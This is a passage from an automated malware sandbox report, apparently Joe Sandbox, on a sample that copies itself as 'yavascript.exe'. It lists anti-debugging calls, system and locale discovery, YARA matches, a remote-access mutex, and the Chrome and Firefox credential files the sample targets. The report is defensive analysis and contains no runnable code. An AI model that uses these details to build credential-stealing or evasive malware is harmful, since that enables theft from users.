            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_021243CF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_0212A8C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_02123DAB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_00433CD7 SetUnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_007843CF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_0078A8C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_00783DAB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_00433CD7 SetUnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_021643CF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_0216A8C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_02163DAB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 38_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 38_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 38_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 38_2_00433CD7 SetUnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 38_2_021B43CF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 38_2_021BA8C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 38_2_021B3DAB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 0_2_00410F36
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 17_2_00410F36
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 20_2_00410F36
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 38_2_00410F36
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_00418754 mouse_event
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Process created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
            Source: yavascript.exe, 00000011.00000002.4625247428.00000000008AC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
            Source: yavascript.exe, 00000011.00000002.4625247428.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625247428.000000000088D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_00433E0A cpuid
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: EnumSystemLocalesW, 0_2_004470AE
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: GetLocaleInfoW, 0_2_004510BA
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_004511E3
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: GetLocaleInfoW, 0_2_004512EA
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_004513B7
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: GetLocaleInfoW, 0_2_00447597
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: GetLocaleInfoA, 0_2_0040E679
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_00450A7F
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: EnumSystemLocalesW, 0_2_00450CF7
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: EnumSystemLocalesW, 0_2_00450D42
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: EnumSystemLocalesW, 0_2_00450DDD
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00450E6A
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: EnumSystemLocalesW, 0_2_02137315
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: GetLocaleInfoW, 0_2_02141321
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: EnumSystemLocalesW, 0_2_02141044
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0214161E
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: GetLocaleInfoW, 0_2_021377FE
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_0214144A
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: GetLocaleInfoW, 0_2_02141551
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: GetLocaleInfoA, 0_2_020FE8E0
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: EnumSystemLocalesW, 0_2_02140F5E
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: EnumSystemLocalesW, 0_2_02140FA9
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_02140CE6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoA, 17_2_0040E679
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: EnumSystemLocalesW, 17_2_004470AE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW, 17_2_004510BA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 17_2_004511E3
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW, 17_2_004512EA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 17_2_004513B7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW, 17_2_00447597
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 17_2_00450A7F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: EnumSystemLocalesW, 17_2_00450CF7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: EnumSystemLocalesW, 17_2_00450D42
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: EnumSystemLocalesW, 17_2_00450DDD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 17_2_00450E6A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: EnumSystemLocalesW, 17_2_007A1044
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW, 17_2_007A1321
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: EnumSystemLocalesW, 17_2_00797315
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 17_2_007A144A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW, 17_2_007A1551
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 17_2_007A161E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW, 17_2_007977FE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoA, 17_2_0075E8E0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 17_2_007A0CE6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: EnumSystemLocalesW, 17_2_007A0F5E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: EnumSystemLocalesW, 17_2_007A0FA9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: EnumSystemLocalesW, 20_2_004470AE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW, 20_2_004510BA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 20_2_004511E3
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW, 20_2_004512EA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 20_2_004513B7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW, 20_2_00447597
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoA, 20_2_0040E679
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 20_2_00450A7F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: EnumSystemLocalesW, 20_2_00450CF7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: EnumSystemLocalesW, 20_2_00450D42
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: EnumSystemLocalesW, 20_2_00450DDD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 20_2_00450E6A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: EnumSystemLocalesW, 20_2_02177315
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW, 20_2_02181321
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: EnumSystemLocalesW, 20_2_02181044
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 20_2_0218161E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW, 20_2_021777FE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 20_2_0218144A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoW, 20_2_02181551
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: GetLocaleInfoA, 20_2_0213E8E0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: EnumSystemLocalesW, 20_2_02180F5E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: EnumSystemLocalesW, 20_2_02180FA9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,20_2_02180CE6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,38_2_004470AE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,38_2_004510BA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,38_2_004511E3
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,38_2_004512EA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,38_2_004513B7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,38_2_00447597
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoA,38_2_0040E679
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,38_2_00450A7F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,38_2_00450CF7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,38_2_00450D42
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,38_2_00450DDD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,38_2_00450E6A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,38_2_021C7315
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,38_2_021D1321
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,38_2_021D1044
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,38_2_021D161E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,38_2_021C77FE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,38_2_021D144A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoW,38_2_021D1551
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: GetLocaleInfoA,38_2_0218E8E0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,38_2_021D0F5E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: EnumSystemLocalesW,38_2_021D0FA9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,38_2_021D0CE6
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00434010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00434010
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0041A7A2 GetComputerNameExW,GetUserNameW,0_2_0041A7A2
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0044800F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

Source: Yara match | File source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2295191627.00000000005A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.2378390823.0000000000748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2309481158.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: yPIOW6yoPi.exe PID: 1612, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: yavascript.exe PID: 1512, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: yavascript.exe PID: 4196, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: yavascript.exe PID: 1352, type: MEMORYSTR
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data, 0_2_0040B21B
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data, 17_2_0040B21B
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data, 20_2_0040B21B
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data, 38_2_0040B21B
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\, 0_2_0040B335
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: \key3.db, 0_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\, 17_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: \key3.db, 17_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\, 20_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: \key3.db, 20_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\, 38_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: \key3.db, 38_2_0040B335

            Remote Access Functionality

Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-I7G983
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-I7G983
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-I7G983
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-I7G983
Source: Yara match | File source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2295191627.00000000005A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.2378390823.0000000000748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2309481158.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
